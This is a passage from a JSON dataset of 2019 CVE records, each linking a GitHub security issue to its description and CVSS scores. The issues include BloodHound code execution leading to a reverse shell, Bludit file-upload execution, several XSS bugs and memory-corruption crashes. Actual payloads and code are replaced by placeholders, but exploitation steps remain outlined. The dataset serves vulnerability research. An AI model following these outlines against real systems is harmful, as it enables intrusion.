  38294. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:N/A:N",
  38295. "severity": "MEDIUM",
  38296. "baseScore": 4.3,
  38297. "impactScore": 1.4,
  38298. "exploitabilityScore": 2.8
  38299. },
  38300. {
  38301. "CVE_ID": "CVE-2019-15701",
  38302. "Issue_Url_old": "https://github.com/BloodHoundAD/BloodHound/issues/267",
  38303. "Issue_Url_new": "https://github.com/bloodhoundad/bloodhound/issues/267",
  38304. "Repo_new": "bloodhoundad/bloodhound",
  38305. "Issue_Created_At": "2019-08-25T02:48:07Z",
  38306. "description": "Code execution in Bloodhound via malicious AD Object. Dear Bloodhound Team \u2013 I identified a way to achieve code execution in Bloodhound by creating a GPO with a name containing APITAG code that will trigger in Bloodhound's search autocomplete function. The injected APITAG is not only a valid xss but also allows the creation of a child process. The following steps are required to reproduce the vulnerability with a simple reverse shell using ncat NUMBERTAG Create a GPO with the following name: APITAG NUMBERTAG Run Sharphound APITAG NUMBERTAG Import collected data NUMBERTAG Host the following js payload as FILETAG (all uppercase is important here since the sharphound output json always has the value for the name field in upper case) APITAG APITAG e.g. with APITAG NUMBERTAG Start listener APITAG NUMBERTAG Search for \"aa\" in Bloodhound and catch the shell I suppose there is still a lot of room for improving the actual exploit. Probably there are better strings to make it trigger on than \"aaaaa\" and I also would not consider APITAG as one of my strengths but I hope I could prove my point here :) I also made a video APITAG Bloodhound APITAG URLTAG",
  38307. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
  38308. "severity": "HIGH",
  38309. "baseScore": 8.8,
  38310. "impactScore": 5.9,
  38311. "exploitabilityScore": 2.8
  38312. },
  38313. {
  38314. "CVE_ID": "CVE-2019-15702",
  38315. "Issue_Url_old": "https://github.com/RIOT-OS/RIOT/issues/12086",
  38316. "Issue_Url_new": "https://github.com/riot-os/riot/issues/12086",
  38317. "Repo_new": "riot-os/riot",
  38318. "Issue_Created_At": "2019-08-26T15:10:23Z",
  38319. "description": "gnrc_tcp: option parsing doesn't terminate on all inputs, potential DOS. Description The APITAG parser for TCP options ( APITAG ) doesn't terminate on all inputs. When sending a packet with an unknown option and option length zero it doesn't advance the option pointer (i.e. advances it by zero) and therefore stays in the loop forever. Steps to reproduce the issue NUMBERTAG Configure the interface tap as follows APITAG NUMBERTAG Enable debug in APITAG NUMBERTAG Compile APITAG using: APITAG NUMBERTAG Start APITAG using: APITAG NUMBERTAG Invoke the following python script (requires scapy): CODETAG For example using APITAG Expected results The application should parse the unknown option once. Actual results The application parses the unknown option an infinite amount of times. Example output: ERRORTAG Impact Denial of service, possibly allowing battery drain, et cetera.",
  38320. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  38321. "severity": "HIGH",
  38322. "baseScore": 7.5,
  38323. "impactScore": 3.6,
  38324. "exploitabilityScore": 3.9
  38325. },
  38326. {
  38327. "CVE_ID": "CVE-2019-15714",
  38328. "Issue_Url_old": "https://github.com/entropic-dev/entropic/issues/251",
  38329. "Issue_Url_new": "https://github.com/entropic-dev/entropic/issues/251",
  38330. "Repo_new": "entropic-dev/entropic",
  38331. "Issue_Created_At": "2019-06-11T13:00:16Z",
  38332. "description": "possible parent path traversal in command argument. Is this a feature request or a bug? bug Parent path traversal URLTAG is often considered a security problem. This is likely low impact if it is a security problem; the only vectors I can see is socially engineered copy/paste or postinstall hook abuse. If an attacker can get a JS file onto the machine, they might be able to use shell injection or malicious hooks to cause entropic to load that JS file, but an attacker can usually do anything via shell access that they could by running JS in the entropic process unless entropic evolved to accept multiple commands as a long lived, privileged process. Actual behavior: URLTAG APITAG fails with an error like ERRORTAG ... is not a function\" This works because APITAG backs out of APITAG to the root directory for entropic. Expected behavior: A command passed as the zero th argument at the command line should not cause line NUMBERTAG to load a package outside the commands subdirectory. Line NUMBERTAG should not load a dev dependency or a globally installed non dependency. Specifically, APITAG should dump help info instead of potentially calling prettier's export as an async function. Steps to replicate: APITAG Possible fix One way to address is to define a ERRORTAG that uses APITAG to convert APITAG to a file path, then use APITAG to find a path relative to __DIRNAME and see if the first component of that relative path is commands . Alternatively, if there is no desire to support commands like APITAG in the future then main could dump help text when APITAG . I can put together a PR if desired.",
  38333. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  38334. "severity": "MEDIUM",
  38335. "baseScore": 5.3,
  38336. "impactScore": 1.4,
  38337. "exploitabilityScore": 3.9
  38338. },
  38339. {
  38340. "CVE_ID": "CVE-2019-15716",
  38341. "Issue_Url_old": "https://github.com/wtfutil/wtf/issues/517",
  38342. "Issue_Url_new": "https://github.com/wtfutil/wtf/issues/517",
  38343. "Repo_new": "wtfutil/wtf",
  38344. "Issue_Created_At": "2019-07-24T16:02:21Z",
  38345. "description": "Security: open call for thoughts on securing WTF's config file. WTF's APITAG file is a plain text file stored in the user's home directory. Given the nature of many of the modules in WTF, that file could hold account information, passwords, URIs, and API keys for the user's critical systems. This issue is a place to discuss the security of that file NUMBERTAG Does it need to be secured? Should we just trust the machine instead NUMBERTAG If it should, how so? What's least friction for the user?",
  38346. "vectorString": "CVSS:3.0/AV:L/AC:L/PR:L/UI:N/S:U/C:H/I:N/A:N",
  38347. "severity": "MEDIUM",
  38348. "baseScore": 5.5,
  38349. "impactScore": 3.6,
  38350. "exploitabilityScore": 1.8
  38351. },
  38352. {
  38353. "CVE_ID": "CVE-2019-15758",
  38354. "Issue_Url_old": "https://github.com/WebAssembly/binaryen/issues/2288",
  38355. "Issue_Url_new": "https://github.com/webassembly/binaryen/issues/2288",
  38356. "Repo_new": "webassembly/binaryen",
  38357. "Issue_Created_At": "2019-08-07T21:48:28Z",
  38358. "description": "Crash and Assertion failed in wasm2js. Hi, I observed two crash and assertion failed in wasm2js (based on commit APITAG The poc files are attached. How to reproduce: APITAG FILETAG Report of backtrace in gdb Assertaion failed ERRORTAG Crash ERRORTAG",
  38359. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  38360. "severity": "MEDIUM",
  38361. "baseScore": 6.5,
  38362. "impactScore": 3.6,
  38363. "exploitabilityScore": 2.8
  38364. },
  38365. {
  38366. "CVE_ID": "CVE-2019-15811",
  38367. "Issue_Url_old": "https://github.com/domainmod/domainmod/issues/108",
  38368. "Issue_Url_new": "https://github.com/domainmod/domainmod/issues/108",
  38369. "Repo_new": "domainmod/domainmod",
  38370. "Issue_Created_At": "2019-08-28T21:27:49Z",
  38371. "description": "XSS: The parameter 'daterange' is not being sanitized correctly.. Hello, There is a Cross Site Scripting vulnerability in the file APITAG in the parameter daterange . APITAG of Concept:__ URLTAG Kind Regards, APITAG",
  38372. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  38373. "severity": "MEDIUM",
  38374. "baseScore": 6.1,
  38375. "impactScore": 2.7,
  38376. "exploitabilityScore": 2.8
  38377. },
  38378. {
  38379. "CVE_ID": "CVE-2019-15903",
  38380. "Issue_Url_old": "https://github.com/libexpat/libexpat/issues/317",
  38381. "Issue_Url_new": "https://github.com/libexpat/libexpat/issues/317",
  38382. "Repo_new": "libexpat/libexpat",
  38383. "Issue_Created_At": "2019-08-26T03:09:37Z",
  38384. "description": "Heap overflow in APITAG Hello, Heap overflow found when I call below apis with a crafted input value. parser = APITAG APITAG APITAG if APITAG input, (int)strlen(input), XML_TRUE) != XML_STATUS_SUSPENDED) { fprintf(stderr, \"%d\", APITAG } Attached file has both a source code to replay this bug and the bug report of address sanitizer. This bug found R NUMBERTAG R NUMBERTAG I used following commands to build libexpat and build the source code for replaying the bug. FILETAG",
  38385. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  38386. "severity": "HIGH",
  38387. "baseScore": 7.5,
  38388. "impactScore": 3.6,
  38389. "exploitabilityScore": 3.9
  38390. },
  38391. {
  38392. "CVE_ID": "CVE-2019-15903",
  38393. "Issue_Url_old": "https://github.com/libexpat/libexpat/issues/342",
  38394. "Issue_Url_new": "https://github.com/libexpat/libexpat/issues/342",
  38395. "Repo_new": "libexpat/libexpat",
  38396. "Issue_Created_At": "2019-09-08T18:11:07Z",
  38397. "description": "Release Expat NUMBERTAG Regular releases: ] Bump APITAG version info, document in change log [ ] make distcheck source tarballs using APITAG [ ] Build and test Windows installer APITAG [ ] APITAG [ ] Upload Windows installer [ ] Upload source tarballs + APITAG GPG signature NUMBERTAG Make one new source tarball default download for all but Windows [ ] Make new installer binary default download for Windows [ ] APITAG [ ] APITAG signed Git tag URLTAG and push it [ ] Upload source tarball + APITAG GPG signature NUMBERTAG Upload Windows installer APITAG [ ] Let the community know: [ ] News item on FILETAG [ ] Mail Expat distro maintainers directly [ ] Write to the xml dev mailing list \u2014 TODO [ ] Blog about it at APITAG \u2014 TODO [ ] Submit to Hacker News \u2014 TODO [ ] Blog about it at APITAG \u2014 TODO [ ] APITAG ebuild in Gentoo) Specific to NUMBERTAG Request CVE for NUMBERTAG CVETAG [x] Add CVE to change log [ ] Open security bug in Gentoo \u2014 TODO",
  38398. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  38399. "severity": "HIGH",
  38400. "baseScore": 7.5,
  38401. "impactScore": 3.6,
  38402. "exploitabilityScore": 3.9
  38403. },
  38404. {
  38405. "CVE_ID": "CVE-2019-15947",
  38406. "Issue_Url_old": "https://github.com/bitcoin/bitcoin/issues/16824",
  38407. "Issue_Url_new": "https://github.com/bitcoin/bitcoin/issues/16824",
  38408. "Repo_new": "bitcoin/bitcoin",
  38409. "Issue_Created_At": "2019-09-07T17:24:59Z",
  38410. "description": "Crash dumps from bitcoin qt contain wallets. On a crash, bitcoin qt may dump a core file that contains what was in memory at the time of the crash, for debugging purposes. The problem here is that bitcoin qt stores the user's wallet.dat unencrypted in memory. With this information it becomes rather trivial to reconstruct parts of a user's wallet.dat from a .core dump alone. You can find the wallets within the core file simply by grepping for known parts of a wallet.dat ex: APITAG With this information you can find the offset of the wallet within the core file, and reconstruct it per a known APITAG length. Upon reloading the extracted wallet into bitcoin qt, you'll lose address book information but balance is retained. This has been assigned CVETAG . URLTAG CVETAG",
  38411. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:N/A:N",
  38412. "severity": "HIGH",
  38413. "baseScore": 7.5,
  38414. "impactScore": 3.6,
  38415. "exploitabilityScore": 3.9
  38416. },
  38417. {
  38418. "CVE_ID": "CVE-2019-16060",
  38419. "Issue_Url_old": "https://github.com/airbrake/airbrake-ruby/issues/468",
  38420. "Issue_Url_new": "https://github.com/airbrake/airbrake-ruby/issues/468",
  38421. "Repo_new": "airbrake/airbrake-ruby",
  38422. "Issue_Created_At": "2019-04-09T18:07:23Z",
  38423. "description": "blacklist_keys not being filtered out in version NUMBERTAG airbrake ruby version NUMBERTAG airbrake version NUMBERTAG also saw this issue with NUMBERTAG Ruby version NUMBERTAG Framework name & version: Rails NUMBERTAG Airbrake config CODETAG Description The APITAG are no longer being filtered out of the parameters. I can test this way from the console: ERRORTAG On airbrake ruby version NUMBERTAG the parameters show up as: APITAG On version NUMBERTAG of the gem, that filtering doesn't happen: APITAG I was able to get blacklist filtering to work again by adding this to the initializer, right after the APITAG block: APITAG",
  38424. "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  38425. "severity": "CRITICAL",
  38426. "baseScore": 9.8,
  38427. "impactScore": 5.9,
  38428. "exploitabilityScore": 3.9
  38429. },
  38430. {
  38431. "CVE_ID": "CVE-2019-16096",
  38432. "Issue_Url_old": "https://github.com/antirez/kilo/issues/60",
  38433. "Issue_Url_new": "https://github.com/antirez/kilo/issues/60",
  38434. "Repo_new": "antirez/kilo",
  38435. "Issue_Created_At": "2019-08-27T02:04:47Z",
  38436. "description": "Integer Overflow && heap buffer overflow in kilo.c. There is a heap overflow caused by integer overflow in kilo.c. POC: APITAG In command line: APITAG Output: ERRORTAG Analyze: There is an integer overflow in function APITAG CODETAG The space size being malloc will be calculated based on the number of TABs in one row. When the number of TAB is too big,it will lead to Integer Overflow. And it will lead to heap buffer overflow finally.",
  38437. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  38438. "severity": "HIGH",
  38439. "baseScore": 7.5,
  38440. "impactScore": 3.6,
  38441. "exploitabilityScore": 3.9
  38442. },
  38443. {
  38444. "CVE_ID": "CVE-2019-16109",
  38445. "Issue_Url_old": "https://github.com/plataformatec/devise/issues/5071",
  38446. "Issue_Url_new": "https://github.com/heartcombo/devise/issues/5071",
  38447. "Repo_new": "heartcombo/devise",
  38448. "Issue_Created_At": "2019-05-04T00:12:11Z",
  38449. "description": "Confirmable should generate a token if confirmation_token is currently an empty string. Environment Ruby NUMBERTAG p NUMBERTAG Rails NUMBERTAG Devise NUMBERTAG Current behavior Currently, when using the confirmable module, devise only checks if the APITAG field not nil. If it's nil, it will generate a confirmation token for you; if it's not, it won't. However, it can be set to an empty string, which should not be allowed, as it presents a security issue, allowing someone passing an empty string as the confirmation token to sign in as the person with the blank string confirmation token. This is the offending code: URLTAG Expected behavior Devise should do something like APITAG , which checks for nil and blank.",
  38450. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  38451. "severity": "MEDIUM",
  38452. "baseScore": 5.3,
  38453. "impactScore": 1.4,
  38454. "exploitabilityScore": 3.9
  38455. },
  38456. {
  38457. "CVE_ID": "CVE-2019-16113",
  38458. "Issue_Url_old": "https://github.com/bludit/bludit/issues/1081",
  38459. "Issue_Url_new": "https://github.com/bludit/bludit/issues/1081",
  38460. "Repo_new": "bludit/bludit",
  38461. "Issue_Created_At": "2019-09-07T11:40:38Z",
  38462. "description": "Bludit NUMBERTAG Code Execution Vulnerability in APITAG function\" . A Code Execution Vulnerability in Bludit NUMBERTAG Hi, For CVE ID,so I open a new issue,sorry about APITAG I think you haven't completely fixed the bug. There is a new Code Execution Vulnerability which allow to get server permissions,the path is PATHTAG NUMBERTAG login with any account which allows you to edit conten FILETAG NUMBERTAG upload the evil jpg We can specify the location of the uploaded file by changing the value of the uuid,then upload the evil picture to tmp folder FILETAG FILETAG NUMBERTAG upload both APITAG file and the access target jpg FILETAG FILETAG FILETAG Successfully reverted to the target file NUMBERTAG Access the evil file that are written through jpg FILETAG So I recommend checking the file before uploading it to temporary directory",
  38463. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H",
  38464. "severity": "HIGH",
  38465. "baseScore": 8.8,
  38466. "impactScore": 5.9,
  38467. "exploitabilityScore": 2.8
  38468. },
  38469. {
  38470. "CVE_ID": "CVE-2019-16126",
  38471. "Issue_Url_old": "https://github.com/getgrav/grav/issues/2657",
  38472. "Issue_Url_new": "https://github.com/getgrav/grav/issues/2657",
  38473. "Repo_new": "getgrav/grav",
  38474. "Issue_Created_At": "2019-08-31T12:29:53Z",
  38475. "description": "XSS: Stored XSS due to Javascript execution in SVG files. Hello, I found that when uploading a new avatar, you can upload a SVG file, which can contain Javascript (which gets executed upon visit). I've attached a SVG file which can be used to reproduce the issue. If more information is needed, I can provide that. Kind regards, MENTIONTAG FILETAG",
  38476. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  38477. "severity": "MEDIUM",
  38478. "baseScore": 6.1,
  38479. "impactScore": 2.7,
  38480. "exploitabilityScore": 2.8
  38481. },
  38482. {
  38483. "CVE_ID": "CVE-2019-16130",
  38484. "Issue_Url_old": "https://github.com/weison-tech/yii2-cms/issues/2",
  38485. "Issue_Url_new": "https://github.com/weison-tech/yii2-cms/issues/2",
  38486. "Repo_new": "weison-tech/yii2-cms",
  38487. "Issue_Created_At": "2019-08-31T14:28:50Z",
  38488. "description": "yii2 cms\u5b58\u5728\u5b58\u50a8\u578bXSS. \u5728\u524d\u7aef\u7684\u7559\u8a00\u5904\u672a\u8fc7\u6ee4\u8f93\u5165\u5185\u5bb9 \u6709\u6548\u8d1f\u8377\uff1a APITAG \u6587\u4ef6\u540d PATHTAG \u4ee3\u7801 ERRORTAG \u5229\u7528 \u6211\u4eec\u53d1\u73b0name\u6ca1\u6709\u9650\u5236\u8f93\u5165\u7684\u957f\u5ea6\uff0c\u5c1d\u8bd5\u6784\u9020\u6709\u6548\u8d1f\u8377 POC CODETAG \u7ed3\u679c \u6211\u4eec\u53bb\u540e\u53f0\u67e5\u770b FILETAG",
  38489. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N",
  38490. "severity": "MEDIUM",
  38491. "baseScore": 6.1,
  38492. "impactScore": 2.7,
  38493. "exploitabilityScore": 2.8
  38494. },
  38495. {
  38496. "CVE_ID": "CVE-2019-16139",
  38497. "Issue_Url_old": "https://github.com/llogiq/compact_arena/issues/22",
  38498. "Issue_Url_new": "https://github.com/llogiq/compact_arena/issues/22",
  38499. "Repo_new": "llogiq/compact_arena",
  38500. "Issue_Created_At": "2019-05-21T18:44:48Z",
  38501. "description": "Generativity mechanism is unsound \ud83d\udca5. (sorry; I only found this because I was trying to imitate your closure less generativity) CODETAG This successfully compiles and panics with ERRORTAG and segfaults when compiled in release mode with ERRORTAG APITAG",
  38502. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  38503. "severity": "CRITICAL",
  38504. "baseScore": 9.8,
  38505. "impactScore": 5.9,
  38506. "exploitabilityScore": 3.9
  38507. },
  38508. {
  38509. "CVE_ID": "CVE-2019-16141",
  38510. "Issue_Url_old": "https://github.com/matklad/once_cell/issues/46",
  38511. "Issue_Url_new": "https://github.com/matklad/once_cell/issues/46",
  38512. "Repo_new": "matklad/once_cell",
  38513. "Issue_Created_At": "2019-09-01T16:23:01Z",
  38514. "description": "Lazy can cause UB when initialization fails, and program retries initialization. The following program causes UB: ERRORTAG This is because of incorrect use of ERRORTAG when Lazy structure is poisoned. ERRORTAG This should panic instead of causing unchecked UB.",
  38515. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  38516. "severity": "HIGH",
  38517. "baseScore": 7.5,
  38518. "impactScore": 3.6,
  38519. "exploitabilityScore": 3.9
  38520. },
  38521. {
  38522. "CVE_ID": "CVE-2019-16144",
  38523. "Issue_Url_old": "https://github.com/Xudong-Huang/generator-rs/issues/9",
  38524. "Issue_Url_new": "https://github.com/xudong-huang/generator-rs/issues/9",
  38525. "Repo_new": "xudong-huang/generator-rs",
  38526. "Issue_Created_At": "2019-01-11T21:34:45Z",
  38527. "description": "APITAG is unsound. APITAG takes NUMBERTAG APITAG parameters, but the rest of the Scope API assumes that those raw pointers are valid. For example, the public APITAG method does the following: ERRORTAG Calling APITAG with invalid (null, misaligned or dangling) pointers is possible in safe Rust, and APITAG can also be called from safe Rust, therefore this API is unsound. Either APITAG should be marked ERRORTAG , or it should take APITAG instead of raw pointers, adding a lifetime parameter to Scope .",
  38528. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  38529. "severity": "HIGH",
  38530. "baseScore": 7.5,
  38531. "impactScore": 3.6,
  38532. "exploitabilityScore": 3.9
  38533. },
  38534. {
  38535. "CVE_ID": "CVE-2019-16161",
  38536. "Issue_Url_old": "https://github.com/k-takata/Onigmo/issues/132",
  38537. "Issue_Url_new": "https://github.com/k-takata/onigmo/issues/132",
  38538. "Repo_new": "k-takata/onigmo",
  38539. "Issue_Created_At": "2019-07-27T23:59:01Z",
  38540. "description": "Memory corruption in APITAG When onig_new(ONIG_SYNTAX_PERL) failes with error code APITAG APITAG crashes due to invalid memory access. Here is a POC code based on sample/syntax.c ERRORTAG CODETAG I've confirmed that, after onig_new(ONIG_SYNTAX_PERL ....) failure in APITAG einfo.enc points to invalid address. Then APITAG force to use some member of invalid APITAG causes memory corruption. Here is a crash log. ONIGENC_MBC_TO_CODE(enc, p, end) in APITAG try to call NULL address (einfo.enc >mbc_to_code). ERRORTAG Thanks Ren",
  38541. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  38542. "severity": "HIGH",
  38543. "baseScore": 7.5,
  38544. "impactScore": 3.6,
  38545. "exploitabilityScore": 3.9
  38546. },
  38547. {
  38548. "CVE_ID": "CVE-2019-16162",
  38549. "Issue_Url_old": "https://github.com/k-takata/Onigmo/issues/139",
  38550. "Issue_Url_new": "https://github.com/k-takata/onigmo/issues/139",
  38551. "Repo_new": "k-takata/onigmo",
  38552. "Issue_Created_At": "2019-07-31T00:45:06Z",
  38553. "description": "Out of bounds read in APITAG When Onigmo try to parse a regular expression NUMBERTAG it causes out of bounds read in APITAG Here is a POC code based on sample/syntax.c ERRORTAG APITAG Here is a crash log. CODETAG Thanks",
  38554. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  38555. "severity": "HIGH",
  38556. "baseScore": 7.5,
  38557. "impactScore": 3.6,
  38558. "exploitabilityScore": 3.9
  38559. },
  38560. {
  38561. "CVE_ID": "CVE-2019-16163",
  38562. "Issue_Url_old": "https://github.com/kkos/oniguruma/issues/147",
  38563. "Issue_Url_new": "https://github.com/kkos/oniguruma/issues/147",
  38564. "Repo_new": "kkos/oniguruma",
  38565. "Issue_Created_At": "2019-07-29T02:45:52Z",
  38566. "description": "Stack Exhaustion Problem caused by some parsing function in regcomp.c making recursive calls to itself. If Oniguruma try to optimize very deep regex nodes, it causes stack buffer overflow due to deep recursive calls to some parsing functions like APITAG APITAG Here is a POC source code that simply executes APITAG with very large regular expression APITAG .... \". ERRORTAG APITAG ERRORTAG",
  38567. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H",
  38568. "severity": "HIGH",
  38569. "baseScore": 7.5,
  38570. "impactScore": 3.6,
  38571. "exploitabilityScore": 3.9
  38572. },
  38573. {
  38574. "CVE_ID": "CVE-2019-16164",
  38575. "Issue_Url_old": "https://github.com/lexborisov/myhtml/issues/175",
  38576. "Issue_Url_new": "https://github.com/lexborisov/myhtml/issues/175",
  38577. "Repo_new": "lexborisov/myhtml",
  38578. "Issue_Created_At": "2019-07-29T07:41:57Z",
  38579. "description": "NULL ptr dereference in tree node remove callback. POC HTML code is here URLTAG APITAG While parsing above HTML code, myhtml try to remove \\ APITAG tag because \\ APITAG tag is not closed correctly. \" APITAG tag NUMBERTAG b NUMBERTAG a NUMBERTAG e8) and causes NULL ptr dereference at myhtml_node_tag_id( myhtml_node_parent(node) ); in APITAG CODETAG Here is a crash log. ERRORTAG",
  38580. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  38581. "severity": "MEDIUM",
  38582. "baseScore": 6.5,
  38583. "impactScore": 3.6,
  38584. "exploitabilityScore": 2.8
  38585. },
  38586. {
  38587. "CVE_ID": "CVE-2019-16167",
  38588. "Issue_Url_old": "https://github.com/sysstat/sysstat/issues/230",
  38589. "Issue_Url_new": "https://github.com/sysstat/sysstat/issues/230",
  38590. "Repo_new": "sysstat/sysstat",
  38591. "Issue_Created_At": "2019-08-03T01:42:44Z",
  38592. "description": "Memory corruption bug due to Integer Overflow in APITAG If sadf utility reads following stat file, it causes memory corruption (SIGSEGV). FILETAG APITAG A crash happens in following part in FILETAG . ERRORTAG If stat file has large file_magic >hdr_types_nr(ftypes_nr NUMBERTAG the calculation at ftypes_nr NUMBERTAG ULL_ALIGNMENT_WIDTH leads Integer Overflow and pass above size check, then causes OOB access at memset(((char ) ps) + ftypes_nr NUMBERTAG ULL_ALIGNMENT_WIDTH...) Here is a crash log. ERRORTAG Thanks",
  38593. "vectorString": "CVSS:3.1/AV:L/AC:L/PR:N/UI:R/S:U/C:N/I:N/A:H",
  38594. "severity": "MEDIUM",
  38595. "baseScore": 5.5,
  38596. "impactScore": 3.6,
  38597. "exploitabilityScore": 1.8
  38598. },
  38599. {
  38600. "CVE_ID": "CVE-2019-16249",
  38601. "Issue_Url_old": "https://github.com/opencv/opencv/issues/15481",
  38602. "Issue_Url_new": "https://github.com/opencv/opencv/issues/15481",
  38603. "Repo_new": "opencv/opencv",
  38604. "Issue_Created_At": "2019-09-07T15:52:32Z",
  38605. "description": "APITAG Build type: Release APITAG version: APITAG OS: APITAG APITAG VCS version: APITAG I've complied opencv with clang enabling ASAN while fuzzing the opencv_test_video binary APITAG and APITAG ERRORTAG",
  38606. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N",
  38607. "severity": "MEDIUM",
  38608. "baseScore": 5.3,
  38609. "impactScore": 1.4,
  38610. "exploitabilityScore": 3.9
  38611. },
  38612. {
  38613. "CVE_ID": "CVE-2019-16276",
  38614. "Issue_Url_old": "https://github.com/golang/go/issues/34540",
  38615. "Issue_Url_new": "https://github.com/golang/go/issues/34540",
  38616. "Repo_new": "golang/go",
  38617. "Issue_Created_At": "2019-09-25T21:40:44Z",
  38618. "description": "net/http: invalid headers are normalized, allowing request smuggling. net/http (through net/textproto) used to accept and normalize invalid HTTP NUMBERTAG headers with a space before the colon, in violation of RFC NUMBERTAG If a Go server is used behind a reverse proxy that accepts and forwards but doesn't normalize such invalid headers, the reverse proxy and the server can interpret the headers differently. This can lead to filter bypasses or request smuggling, the latter if requests from separate clients are multiplexed onto the same connection by the proxy. Such invalid headers are now rejected by Go servers, and passed without normalization to Go client applications. This issue is CVETAG and is fixed in Go NUMBERTAG and Go NUMBERTAG",
  38619. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:H/A:N",
  38620. "severity": "HIGH",
  38621. "baseScore": 7.5,
  38622. "impactScore": 3.6,
  38623. "exploitabilityScore": 3.9
  38624. },
  38625. {
  38626. "CVE_ID": "CVE-2019-16303",
  38627. "Issue_Url_old": "https://github.com/jhipster/jhipster-kotlin/issues/183",
  38628. "Issue_Url_new": "https://github.com/jhipster/jhipster-kotlin/issues/183",
  38629. "Repo_new": "jhipster/jhipster-kotlin",
  38630. "Issue_Created_At": "2019-09-13T22:27:51Z",
  38631. "description": "FILETAG APITAG is using an insecure source of randomness to generate all of it's random values. APITAG relies upon apache commons lang3 APITAG . From the documentation: > Caveat: Instances of Random, upon which the implementation of this class relies, are not cryptographically secure. > \\ FILETAG Here are the examples of APITAG Kotlin's use of an insecure PRNG: URLTAG Proof Of Concepts Already Exist There has been a POC of taking one RNG value generated APITAG and reversing it to generate all of the past/future RNG values public since March NUMBERTAG rd NUMBERTAG URLTAG POC Repository: URLTAG Potential Impact Technical All that is required is to get one password reset token from a APITAG generated service and using the POC above, you can reverse what all future password reset tokens to be generated by this server. This allows an attacker to pick and choose what account they would like to takeover by sending account password reset requests for targeted accounts.",
  38632. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  38633. "severity": "CRITICAL",
  38634. "baseScore": 9.8,
  38635. "impactScore": 5.9,
  38636. "exploitabilityScore": 3.9
  38637. },
  38638. {
  38639. "CVE_ID": "CVE-2019-16303",
  38640. "Issue_Url_old": "https://github.com/jhipster/generator-jhipster/issues/10401",
  38641. "Issue_Url_new": "https://github.com/jhipster/generator-jhipster/issues/10401",
  38642. "Repo_new": "jhipster/generator-jhipster",
  38643. "Issue_Created_At": "2019-09-13T07:57:12Z",
  38644. "description": "Bug bounty for security advisory. This is for URLTAG which isn't public at the time of this writing MENTIONTAG thank you so much for reporting this issue!!! We would like to thank you by giving you a NUMBERTAG bug bounty on the project, and this is why I'm creating this ticket (this is to follow our official process to give money). To have more information on our bug bounties program, please read URLTAG",
  38645. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
  38646. "severity": "CRITICAL",
  38647. "baseScore": 9.8,
  38648. "impactScore": 5.9,
  38649. "exploitabilityScore": 3.9
  38650. },
  38651. {
  38652. "CVE_ID": "CVE-2019-16333",
  38653. "Issue_Url_old": "https://github.com/GetSimpleCMS/GetSimpleCMS/issues/1313",
  38654. "Issue_Url_new": "https://github.com/getsimplecms/getsimplecms/issues/1313",
  38655. "Repo_new": "getsimplecms/getsimplecms",
  38656. "Issue_Created_At": "2019-08-28T13:02:41Z",
  38657. "description": "XSS in FILETAG . Version impacted NUMBERTAG Payload: APITAG FILETAG",
  38658. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
  38659. "severity": "MEDIUM",
  38660. "baseScore": 5.4,
  38661. "impactScore": 2.7,
  38662. "exploitabilityScore": 2.3
  38663. },
  38664. {
  38665. "CVE_ID": "CVE-2019-16334",
  38666. "Issue_Url_old": "https://github.com/bludit/bludit/issues/1078",
  38667. "Issue_Url_new": "https://github.com/bludit/bludit/issues/1078",
  38668. "Repo_new": "bludit/bludit",
  38669. "Issue_Created_At": "2019-08-29T06:40:10Z",
  38670. "description": "Stored XSS in bludit NUMBERTAG ulnerability Bludit NUMBERTAG is vulnerable to a stored XSS vulnerability in Categories > Add New Category > Name Parameter Steps to reproduce the problem Go to Categories > Add New Category and insert the following payload in FILETAG FILETAG",
  38671. "vectorString": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:L/I:L/A:N",
  38672. "severity": "MEDIUM",
  38673. "baseScore": 4.8,
  38674. "impactScore": 2.7,
  38675. "exploitabilityScore": 1.7
  38676. },
  38677. {
